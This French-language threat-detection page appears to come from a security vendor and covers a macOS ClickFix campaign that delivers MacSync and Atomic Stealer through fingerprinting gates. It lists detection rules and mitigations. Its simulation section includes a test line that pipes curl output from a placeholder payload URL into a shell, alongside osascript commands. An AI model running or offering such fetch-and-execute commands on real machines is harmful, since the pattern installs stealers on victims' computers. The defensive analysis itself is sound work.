La campagne macOS ClickFix évolue avec des portes d’infection masquées
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Une campagne ClickFix sur macOS distribue des voleurs d’informations incluant MacSync et Atomic Stealer (AMOS) à travers une porte de fingerprinting côté serveur sophistiquée. L’opération utilise des domaines générés par algorithme et du fingerprinting de navigateur pour s’assurer que les charges utiles malveillantes ne sont livrées qu’aux véritables utilisateurs de macOS, aidant ainsi à échapper à l’analyse de sécurité automatisée et aux robots d’exploration. Cette évolution marque un passage d’une ingénierie sociale large à des techniques de livraison hautement ciblées et dissimulées.
Enquête
Microsoft Threat Intelligence a suivi un cluster de plus de 250 domaines partageant un schéma de nommage distinct pour découvrir la campagne. L’enquête a révélé une transition d’une livraison d’appâts directe vers un processus en deux étapes impliquant un profilage JavaScript léger. En évaluant les signaux WebGL, les décalages horaires et les vérifications anti-analyse, les chercheurs ont déterminé comment l’infrastructure cible sélectivement les environnements macOS tout en présentant un contenu leurre bénin aux requêtes non qualifiées.
Atténuation
Les organisations devraient éduquer les utilisateurs sur le fait que les mises à jour logicielles légitimes ne nécessitent pas de coller des commandes dans le Terminal. Les équipes de sécurité devraient surveiller les activités suspectes du Terminal impliquant des utilitaires tels que curl, base64, gunzip, ou osascript, notamment lorsqu’ils sont déclenchés après la navigation sur le Web. Renforcer les protections autour des données Keychain et surveiller l’archivage non autorisé de fichiers sensibles peut également réduire l’impact d’un compromis réussi.
Réponse
Si une exécution suspecte dans le Terminal ou un accès non autorisé aux magasins de mots de passe est détecté, les intervenants devraient isoler immédiatement le point de terminaison macOS affecté. Examinez les connexions sortantes vers des domaines à faible réputation, en accordant une attention particulière à /curl/ les modèles de requête. Les hôtes de mise en scène malveillants identifiés doivent être bloqués, et l’historique récent du shell doit être examiné pour l’exécution de commandes encodées ou obfusquées.
Flux d’Attaque
Détections
Tentative d’exécution suspecte de Curl [MacOS] (via cmdline)
Proof of Value
Commande et contrôle suspect par demande DNS avec domaine de premier niveau inhabituel (TLD) (via dns)
Proof of Value
Manipulation possible de chaînes encodées en Base64 [MacOS] (via cmdline)
Proof of Value
Détecter les connexions sortantes vers des domaines suspects et géographies/navigateurs inattendus [Pare-feu]
Proof of Value
Exécution de commande malveillante du Terminal macOS via la campagne ClickFix [Création de processus Linux]
Proof of Value
Exécution de la simulation
Prérequis : La vérification pré-vol des télémesures et des bases doit avoir réussi.
Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un mauvais diagnostic.
-
Narratif de l’attaque & Commandes : L’adversaire initie une campagne ClickFix en présentant un message d’erreur faux dans un navigateur Web, incitant l’utilisateur à « Corriger l’erreur » en collant une commande spécifique dans le Terminal. L’objectif de l’attaquant est d’établir une persistance ou de télécharger des logiciels malveillants. La commande utilise
curlpour récupérer une charge utile AppleScript malveillante d’un serveur distant et la pipe dansosascript -epour l’exécuter immédiatement en mémoire, contournant ainsi les analyses traditionnelles basées sur les fichiers. -
Script de test de régression :
# Simulation de ClickFix : Récupération d'une charge utile et exécution via osascript # Remarque: Nous utilisons une commande d'écho inoffensive pour simuler la charge utile distante afin d'éviter toute infection réelle. curl -s https://raw.githubusercontent.com/example/payload/main/script.sh | zsh -c 'osascript -e "display dialog "Alerte de Sécurité : Mise à Jour du Système Requise""' # Pour s'assurer que la règle de détection se déclenche, nous exécutons le modèle exact : osascript -e 'say "Ceci est une attaque simulée"' -
Commandes de nettoyage :
# Aucun fichier n'est écrit sur le disque dans cette exécution de ligne de commande spécifique, # mais nous nous assurons de tuer tout processus en arrière-plan. killall osascript || true